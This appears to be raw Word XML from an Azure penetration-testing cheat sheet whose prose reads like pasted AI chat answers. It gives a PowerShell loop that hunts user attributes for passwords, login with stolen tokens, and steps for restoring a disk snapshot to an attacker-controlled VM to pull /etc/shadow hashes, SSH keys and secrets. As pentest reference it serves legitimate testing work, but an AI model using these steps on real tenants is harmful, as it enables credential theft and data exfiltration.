    <w:p w14:paraId="746CAF52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Useful for spotting exposed metadata like phone numbers, job roles, departments, or credential hints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088EC1CC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6000D64F">
          <v:rect id="_x0000_i1071" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AD5CE3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🎭</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Service Principals (Applications / Backdoors)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D16FFF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>List all Azure AD Service Principals:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC242F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Get-MsolServicePrincipal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208F891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These represent applications that can be abused for persistence, automation, or privilege escalation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C40A8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1B2A7163">
          <v:rect id="_x0000_i1072" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="48993111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🧪</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> One-liner: Search Azure AD for Leaked Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FC305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Scan all user object properties for strings containing "password":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D676C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$users = Get-MsolUser -All</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E97AAF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foreach ($user in $users) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86136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$props = $user | Get-Member -MemberType Properties | Select-Object -ExpandProperty Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A247AF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foreach ($prop in $props) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4B71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    if ($user.$prop -like "*password*") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F103E13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        Write-Output "[*] $($user.UserPrincipalName) [$prop] : $($user.$prop)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2A4780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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A05E93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   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD0DC84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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA87F4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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Goal:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identify accidental password exposure in attributes like Notes, CustomAttributes, or legacy fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D26CF83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464CB0E4">
          <v:rect id="_x0000_i1073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F38179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Would you like a companion section using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>AzureAD</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> module as well (which sometimes exposes more attributes)?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBAD13B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F988D9" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21039A1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 xml:space="preserve">Here is a cleaned-up, corrected, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Penetration Testing–focused</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> rewrite of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Az CLI Tool</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and related tools section:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223B331B" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00000000" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:pict w14:anchorId="072AF113">
          <v:rect id="_x0000_i1074" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="542468FA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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Azure PenTest Cheatsheet: Az CLI &amp; Related Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DC1451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This section covers key Az CLI commands and third-party tools used during Azure penetration testing to enumerate, escalate, and exfiltrate cloud resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D042490" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22FBB0E9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lastRenderedPageBreak/>
        <w:t>Authentication via Az CLI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE9338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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26228424" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>📌</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use this to authenticate interactively or via a stolen refresh token/service principal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153426C8" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CC087FF" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512E0419" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D601157" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="198623C7" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1755CB" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C43380A" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39C9DC08" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="100AF740" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Azure Pentest CLI Cheat sheet (Az CLI + Tools)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBC0BA6" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C179807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                                # Interactive login (opens browser)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70300B46" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7A70">
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>az login --username user --password pw  # Non-MFA environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2D683F" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F0547C7" w14:textId="77777777" w:rsidR="00F265C5" w:rsidRPr="00AA7A70" w:rsidRDefault="00F265C5" w:rsidP="00F265C5">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6AEFCD" w14:textId="77777777" w:rsidR="0088453E" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237E7DF7" w14:textId="77777777" w:rsidR="0088453E" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46B33530" w14:textId="77777777" w:rsidR="0088453E" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="640C3EB6" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc226381622"/>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Azure – Mount a Restored Managed Disk (Snapshot) to a Linux VM (Forensic/Exfil Use)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="44CEC8DF" w14:textId="77777777" w:rsidR="0088453E" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFCFD69" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">Here's a rewritten, corrected, and Azure-specific version of your instructions in the context of an </w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Azure penetration test</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">, focusing on </w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mounting a restored managed disk (from a snapshot) to a Linux VM</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve"> to analyze or extract data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43927C49" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="3BC20F42">
          <v:rect id="_x0000_i1075" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B6DFDF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🔓</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B768AC" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>During a penetration test, gaining access to Azure-managed disk snapshots can lead to full recovery of VM disk content. If the compromised credentials allow snapshot or disk access, you can restore and mount the disk to a VM you control for offline analysis or lateral movement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E374F3A" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="1ED036AA">
          <v:rect id="_x0000_i1076" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE71526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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Note on Azure Snapshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E232BAC" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>Azure disk snapshots are full point-in-time copies of managed disks, not incremental like AWS EBS. Restoring a disk requires creating a new managed disk from the snapshot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464F294B" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="34CDC983">
          <v:rect id="_x0000_i1077" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F00AD8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🧭</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step-by-Step: Mount Azure Snapshot to a Linux VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DCF030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1. Create a Managed Disk from the Snapshot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF7349B" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>az disk create \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AA0FFA" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --resource-group &lt;rg-name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F33B26E" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --name restoredDisk01 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D50D9D0" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --source &lt;snapshot-id-or-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C0CEB7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2. Attach Disk to Target VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC70744" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:lastRenderedPageBreak/>
        <w:t>az vm disk attach \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6E8BCE" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --vm-name &lt;vm-name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF617FC" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --resource-group &lt;rg-name&gt; \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0502D03A" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t xml:space="preserve">  --name restoredDisk01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FB04F4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3. SSH into the Linux VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F9F435" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>ssh azureuser@&lt;vm-ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371A80DA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4. List Disks to Identify New Device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECDFEBE" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>lsblk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB286CF" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>You should see a new device (e.g., /dev/sdc, /dev/sdd, or /dev/sdX) that wasn’t there before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEA6720" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="55B87171">
          <v:rect id="_x0000_i1078" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11830BBF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Optional: Check If It’s a Valid Filesystem or Needs Formatting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B665F0C" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>sudo file -s /dev/sdc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51594632" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>If output shows a filesystem (like ext4, xfs), it’s ready to mount.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E6C94C" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>If not, avoid formatting during a Pentest unless needed — it may destroy data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C56057" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="1FE4E780">
          <v:rect id="_x0000_i1079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="470DF3D9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5. Create Mount Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50AA9D" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>sudo mkdir /mnt/restore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAE40A0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6. Mount the Disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F1E9B5" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>sudo mount /dev/sdc1 /mnt/restore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409F8558" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>If there’s no partition (e.g., /dev/sdc1 doesn’t exist), try /dev/sdc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CB4A79" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="2B91DF1C">
          <v:rect id="_x0000_i1080" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF4E511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>7. Verify Mount and Explore Content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D04803C" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>cd /mnt/restore</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B86D71" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>df -h .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4B5440" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>ls -lah</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEC110A" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="16290533">
          <v:rect id="_x0000_i1081" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5674CA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🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="00017CA8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Pentest Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CB4027" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Offline password hash extraction (e.g., /etc/shadow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6868D8AE" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Recovery of SSH keys, app secrets, config files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194D741D" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00017CA8">
        <w:t>Lateral movement or privilege escalation via hardcoded credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6C3B66" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r>
        <w:pict w14:anchorId="3EB928B4">
          <v:rect id="_x0000_i1082" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="122FA11B" w14:textId="77777777" w:rsidR="0088453E" w:rsidRPr="00017CA8" w:rsidRDefault="0088453E" w:rsidP="0088453E">
      <w:r w:rsidRPr="00017CA8">
        <w:t>Would you like an automated script for restoring and mounting disks as part of your Azure post-exploitation toolkit?</w:t>
      </w:r>
    </w:p>
